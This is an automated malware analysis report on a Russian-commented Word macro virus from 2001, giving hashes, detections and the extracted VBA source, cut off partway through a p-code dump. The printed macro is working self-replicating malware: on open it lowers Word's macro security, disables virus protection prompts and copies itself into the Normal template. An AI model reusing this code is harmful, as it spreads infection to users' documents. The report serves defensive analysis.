Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e4d2f60890fafb09…

MALICIOUS

Office (OLE)

37.5 KB Created: 2004-04-27 20:52:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: dd5ed1f6f4831b8e2c6cdaaa982b5c25 SHA-1: 1e54fa0bceb050bd832fbb94a3eb1bd881b4cb9d SHA-256: e4d2f60890fafb09d73a66c65c91603d780aebcba5a5700ff2d248375b0ed8a1
180 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample is a malicious Word document containing VBA macros, specifically a Document_Open macro designed to execute automatically. The macro attempts to lower security settings and appears to be part of a downloader or dropper mechanism, as indicated by ClamAV detections of 'Win.Trojan.Psycho-3' and 'Win.Trojan.wmvg-1'. The document body presents a deceptive interface, likely to lure the user into enabling macros.

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10678 bytes
SHA-256: d8e208b9d9e134d0f3cc635fe1460a298478e7e8d343f646fa4227b511dccf22
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThissDocument"
Attribute VB_Base = "1Normal.ThissDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
' Если ты читаешь эти строки, значит ты уже немного шаришь
' в макросах, и это есть хорошо.  Ты спаситель мира, и только
' ты должен разобраться как он работает и удалить Его. Удачи!.
' Этот код написан в чисто познавательных целях (конечно
' он немного левый, но я и не собирался написать крутой вирус
' и все похерить, просто он уничтожает все другие вирусы ...)
' С наилучшими пожеланиями Extremist 27.12.2001 :-)
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
'CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
'CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Set ActDoc = ActiveDocument.VBProject.VBComponents.Item(1)
Set NormTemp = NormalTemplate.VBProject.VBComponents.Item(1)
NTColLn = NormTemp.CodeModule.CountOfLines
ADColLn = ActDoc.CodeModule.CountOfLines
BGN = 2
If ActDoc.Name <> "ThissDocument" Or ADColLn < 4 Then DoAD = True
If NormTemp.Name <> "ThissDocument" Or NTColLn < 4 Then DoNT = True
If DoNT <> True And DoAD <> True Then GoTo NoToInfect
'
If DoNT = True Then
NormTemp.Name = "ThissDocument"
If NTColLn > 0 Then NormTemp.CodeModule.DeleteLines 1, NTColLn
Do While ActDoc.CodeModule.Lines(1, 1) = ""
ActDoc.CodeModule.DeleteLines 1
Loop
NormTemp.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ActDoc.CodeModule.Lines(BGN, 1) <> ""
NormTemp.CodeModule.InsertLines BGN, ActDoc.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
'
If DoAD = True Then
ActDoc.Name = "ThissDocument"
If ADColLn > 0 Then ActDoc.CodeModule.DeleteLines 1, ADColLn
Do While NormTemp.CodeModule.Lines(1, 1) = ""
NormTemp.CodeModule.DeleteLines 1
Loop
ActDoc.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NormTemp.CodeModule.Lines(BGN, 1) <> ""
ActDoc.CodeModule.InsertLines BGN, NormTemp.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
NoToInfect:
'Destruct
If Year(Now) > 2001 And Rnd > 0.95 Then
Selection.EndKey wdStory
Selection.TypeParagraph
Selection.TypeText "Hi LameR": Selection.TypeParagraph
Selection.TypeText "The Extremist has you..": Selection.TypeParagraph
Selection.LanguageID = wdRussian
End If
'
If NTColLn <> 0 And ADColLn = 0 And (InStr(1, ActiveDocument.Name, "Документ") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Документ") = True) Then
ActiveDocument.Saved = True: End If
End Sub

' Processing file: /opt/analyzer/scan_staging/14573e48e7b04a4889dfdfd8981a0c55.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThissDocument - 5359 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	QuoteRem 0x0000 0x0039 " Если ты читаешь эти строки, значит ты уже немного шаришь"
' Line #2:
' 	QuoteRem 0x0000 0x003C " в макросах, и это есть хорошо.  Ты спаситель мира, и только"
' Line #3:
' 	QuoteRem 0x0000 0x003D " ты должен разобраться как он работает и удалить Его. Удачи!."
' Line #4:
' 	QuoteRem 0x0000 0x0037 " Этот код написан в чисто познавательных целях (конечно"
' Line #5:
' 	QuoteRem 0x0000 0x003C " он немного левый, но я и не собирался написать крутой вирус"
' Line #6:
' 	QuoteRem 0x0000 0x003C " и все похерить, просто он уничтожает все другие вирусы ...)"
' Line #7:
' 	QuoteRem 0x0000 0x0032 " С наилучшими пожеланиями Extremist 27.12.2001 :-)"
' Line #8:
' 	OnError (Resume Next) 
' Line #9:
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\S
... (truncated)